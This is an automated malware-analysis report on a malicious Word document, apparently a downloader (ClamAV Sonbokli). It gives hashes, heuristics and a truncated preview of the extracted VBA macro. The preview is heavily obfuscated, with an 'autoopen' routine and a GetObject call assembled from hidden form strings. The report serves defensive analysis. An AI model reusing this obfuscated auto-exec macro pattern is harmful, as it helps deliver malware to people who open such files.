Office (OLE) malware analysis — malicious · 95486e2d7bdf753a

MALICIOUS

Office (OLE)

165.4 KB Created: 2019-03-28 13:49:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: 5988dff21b137091544a4ad9ae7def47 SHA-1: 35523d127211d1b0d6d5c202e866ee1b3f62ce04 SHA-256: 95486e2d7bdf753ab5dd9caeb51cbb91a06f11521db0fea52573e902a03da112

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Word document containing a legacy WordBasic auto-exec macro named 'autoopen'. Heuristics indicate the macro uses GetObject, a common technique for executing arbitrary code. The obfuscated VBA script further suggests an attempt to download and execute a secondary payload, aligning with common malware delivery mechanisms.

Heuristics 7

ClamAV: Doc.Malware.Sonbokli-6915370-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sonbokli-6915370-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22480 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22480 bytes
SHA-256: `e8fd397f07baa49143de35dc7649e3d286e1f2ed3820ff5e4095a349b7dbd322`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "h_AAAAA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "cAQoUA" Attribute VB_Base = "0{E68407A1-27D4-4170-B10E-001A769AFD77}{F11861FC-9545-452E-AC97-4B7341A0EFE9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "oCD44AB" Attribute VB_Base = "0{D8136306-5B6B-442E-B086-F6E3315371B6}{3E377262-4FF8-4EA2-9A43-CFA3FC4A53A5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "FBAACUA" Function TBAAk1A() If UBZAoA = wAAABA_A Then GwAAABB = _ zAwxAA / Asc(fcAoBZ1) - _ ocXCX_Uw * CDbl(35823486) / YAGXAcDc * CVar( _ 716950983 * Log(TAABQAG1)) / kADoQw * Rnd( _ 796474342) * 453908089 * Sgn(BZ_AXA4A / Log(858749296)) End If If PADUxBGX = RUcBwAD Then rAAUBUkD = _ QA1XcoBD / Asc(WQ4CAAQ) - _ N1XXDAAA * CDbl(255666498) / uwZ_UQ * CVar( _ 25453767 * Log(jUAQAA)) / QAA4UA * Rnd( _ 913775467) * 432340579 * Sgn(zBCBB4w / Log(772446734)) End If If kUAB4w = TAC_AG Then QAcBBD = _ DAUAcA / Asc(GBDXAAD) - _ KkACAk__ * CDbl(643395486) / hkB4AAZ * CVar( _ 569819359 * Log(N4wZAA)) / JQAABDc * Rnd( _ 174345843) * 237670556 * Sgn(L1AQAAc1 / Log(744485854)) End If If a4xABQ_1 = dAZA4Ak Then ZQwQxXZ = _ k_AxQDAD / Asc(dcA4ZU) - _ YGo1cAA * CDbl(208523729) / qcwAC4 * CVar( _ 585513478 * Log(cAABAAAD)) / JAAUQxAx * Rnd( _ 421790389) * 467243095 * Sgn(QAAQUBZA / Log(20797406)) End If If vAAAAAGA = JQAADAX4 Then k4Q1cCQU = _ RABcDA1 / Asc(qBAZ4AwQ) - _ qww4UA * CDbl(315123915) / woCAUDUQ * CVar( _ 962643608 * Log(FAAB1UAk)) / nXZAZXDA * Rnd( _ 873897872) * 715669245 * Sgn(bQBo1D / Log(425539722)) End If If cAAAQQ = QUBwDQ Then jC_AUXB = _ doZoABx / Asc(GQBAcw) - _ UACDU1ck * CDbl(676259274) / iUDDAAwo * CVar( _ 732191294 * Log(cAUXUBQ)) / LGGQAAAB * Rnd( _ 578755640) * 517440301 * Sgn(jDwAAU / Log(197290610)) End If If DBoUAA = mUABQA Then OAAADAQ = _ tD_o1UA / Asc(EA4w_4) - _ jkA_AZ_A * CDbl(11632847) / VxxxAco * CVar( _ 368683111 * Log(X1AxAAD)) / oAwwDU * Rnd( _ 222914783) * 923088206 * Sgn(zw1AAUAA / Log(305909345)) End If End Function Sub autoopen() On Error Resume Next If moDACwAB = qAAUAD Then wBAAAQ = _ QAZDD44D / Asc(RkACAc1Q) - _ HAQUoA * CDbl(243268681) / YCAAAAU * CVar( _ 52488796 * Log(LBGwCAUU)) / OckQUQZo * Rnd( _ 122265484) * 485236334 * Sgn(zAxAQCD / Log(48875873)) End If If OZGUQk = NAA1QAA Then sUADAUk = _ zAQAok / Asc(wUDAAAc) - _ XBAQG4_ * CDbl(506926308) / LCBQQ1AA * CVar( _ 265981501 * Log(zUDCwAXA)) / SQA11oG * Rnd( _ 288272483) * 48616091 * Sgn(jAxAD4QZ / Log(393902824)) End If If lcUAUcA = UxXAcA1 Then QUZAAAQA = _ jAACA1 / Asc(ax_AA_A) - _ NQAAwkAX * CDbl(898287762) / dAZcUAU * CVar( _ 16327239 * Log(oAxBQA)) / OxAADA * Rnd( _ 983721101) * 954291778 * Sgn(LkQQAZQ / Log(874961757)) End If Set dQcQwZ = GetObject(cAQoUA.zAADAxQA.Text + oCD44AB.JDcAoAw + cAQoUA.zAADAxQA) If QUAwZUk = CcAABQC Then oAcwBAUB = _ WBAAQx / Asc(a_AAAAD) - _ HUXoDACB * CDbl(51970150) / dAQGAk * CVar( _ 173544254 * Log(MQAAAAA)) / wQAA_B * Rnd( _ 131735526) * 568759216 * Sgn(CZoU4B / Log(59359302)) End If If a_wokA1 = oDAwA4U Then fxBwXADA = _ JDxxAkAB / Asc(cAQckA) - _ vZQUXD * CDbl(105261486) / OA4AwUA * CVar( _ 189223129 * Log(RAkXQABX)) / sDADccD * Rnd( _ 431769219) * 792871207 * Sgn(u4__Bc_ / Log(324645812)) End If If 921028 = 921028 Then If SC1oBUD = wDAxAB Then nAUDoAA = _ mQ__D4c / Asc(QxDwoA) - _ qUAoGDQ * CDbl(510980311) / bQ_XGDcA * CVar( _ 590237673 * Log(i_Q_QQAw)) / iUUCwD * Rnd( _ 692497723) * 75840401 * Sgn(w ... (truncated)

SHA-256: e8fd397f07baa49143de35dc7649e3d286e1f2ed3820ff5e4095a349b7dbd322

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "h_AAAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cAQoUA"
Attribute VB_Base = "0{E68407A1-27D4-4170-B10E-001A769AFD77}{F11861FC-9545-452E-AC97-4B7341A0EFE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "oCD44AB"
Attribute VB_Base = "0{D8136306-5B6B-442E-B086-F6E3315371B6}{3E377262-4FF8-4EA2-9A43-CFA3FC4A53A5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FBAACUA"
Function TBAAk1A()
   If UBZAoA = wAAABA_A Then
GwAAABB = _
zAwxAA / Asc(fcAoBZ1) - _
ocXCX_Uw * CDbl(35823486) / YAGXAcDc * CVar( _
716950983 * Log(TAABQAG1)) / kADoQw * Rnd( _
796474342) * 453908089 * Sgn(BZ_AXA4A / Log(858749296))
End If
   If PADUxBGX = RUcBwAD Then
rAAUBUkD = _
QA1XcoBD / Asc(WQ4CAAQ) - _
N1XXDAAA * CDbl(255666498) / uwZ_UQ * CVar( _
25453767 * Log(jUAQAA)) / QAA4UA * Rnd( _
913775467) * 432340579 * Sgn(zBCBB4w / Log(772446734))
End If
   If kUAB4w = TAC_AG Then
QAcBBD = _
DAUAcA / Asc(GBDXAAD) - _
KkACAk__ * CDbl(643395486) / hkB4AAZ * CVar( _
569819359 * Log(N4wZAA)) / JQAABDc * Rnd( _
174345843) * 237670556 * Sgn(L1AQAAc1 / Log(744485854))
End If
   If a4xABQ_1 = dAZA4Ak Then
ZQwQxXZ = _
k_AxQDAD / Asc(dcA4ZU) - _
YGo1cAA * CDbl(208523729) / qcwAC4 * CVar( _
585513478 * Log(cAABAAAD)) / JAAUQxAx * Rnd( _
421790389) * 467243095 * Sgn(QAAQUBZA / Log(20797406))
End If
   If vAAAAAGA = JQAADAX4 Then
k4Q1cCQU = _
RABcDA1 / Asc(qBAZ4AwQ) - _
qww4UA * CDbl(315123915) / woCAUDUQ * CVar( _
962643608 * Log(FAAB1UAk)) / nXZAZXDA * Rnd( _
873897872) * 715669245 * Sgn(bQBo1D / Log(425539722))
End If
   If cAAAQQ = QUBwDQ Then
jC_AUXB = _
doZoABx / Asc(GQBAcw) - _
UACDU1ck * CDbl(676259274) / iUDDAAwo * CVar( _
732191294 * Log(cAUXUBQ)) / LGGQAAAB * Rnd( _
578755640) * 517440301 * Sgn(jDwAAU / Log(197290610))
End If
   If DBoUAA = mUABQA Then
OAAADAQ = _
tD_o1UA / Asc(EA4w_4) - _
jkA_AZ_A * CDbl(11632847) / VxxxAco * CVar( _
368683111 * Log(X1AxAAD)) / oAwwDU * Rnd( _
222914783) * 923088206 * Sgn(zw1AAUAA / Log(305909345))
End If
End Function
Sub autoopen()
On Error Resume Next
   If moDACwAB = qAAUAD Then
wBAAAQ = _
QAZDD44D / Asc(RkACAc1Q) - _
HAQUoA * CDbl(243268681) / YCAAAAU * CVar( _
52488796 * Log(LBGwCAUU)) / OckQUQZo * Rnd( _
122265484) * 485236334 * Sgn(zAxAQCD / Log(48875873))
End If
   If OZGUQk = NAA1QAA Then
sUADAUk = _
zAQAok / Asc(wUDAAAc) - _
XBAQG4_ * CDbl(506926308) / LCBQQ1AA * CVar( _
265981501 * Log(zUDCwAXA)) / SQA11oG * Rnd( _
288272483) * 48616091 * Sgn(jAxAD4QZ / Log(393902824))
End If
   If lcUAUcA = UxXAcA1 Then
QUZAAAQA = _
jAACA1 / Asc(ax_AA_A) - _
NQAAwkAX * CDbl(898287762) / dAZcUAU * CVar( _
16327239 * Log(oAxBQA)) / OxAADA * Rnd( _
983721101) * 954291778 * Sgn(LkQQAZQ / Log(874961757))
End If
Set dQcQwZ = GetObject(cAQoUA.zAADAxQA.Text + oCD44AB.JDcAoAw + cAQoUA.zAADAxQA)
   If QUAwZUk = CcAABQC Then
oAcwBAUB = _
WBAAQx / Asc(a_AAAAD) - _
HUXoDACB * CDbl(51970150) / dAQGAk * CVar( _
173544254 * Log(MQAAAAA)) / wQAA_B * Rnd( _
131735526) * 568759216 * Sgn(CZoU4B / Log(59359302))
End If
   If a_wokA1 = oDAwA4U Then
fxBwXADA = _
JDxxAkAB / Asc(cAQckA) - _
vZQUXD * CDbl(105261486) / OA4AwUA * CVar( _
189223129 * Log(RAkXQABX)) / sDADccD * Rnd( _
431769219) * 792871207 * Sgn(u4__Bc_ / Log(324645812))
End If
If 921028 = 921028 Then
   If SC1oBUD = wDAxAB Then
nAUDoAA = _
mQ__D4c / Asc(QxDwoA) - _
qUAoGDQ * CDbl(510980311) / bQ_XGDcA * CVar( _
590237673 * Log(i_Q_QQAw)) / iUUCwD * Rnd( _
692497723) * 75840401 * Sgn(w
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.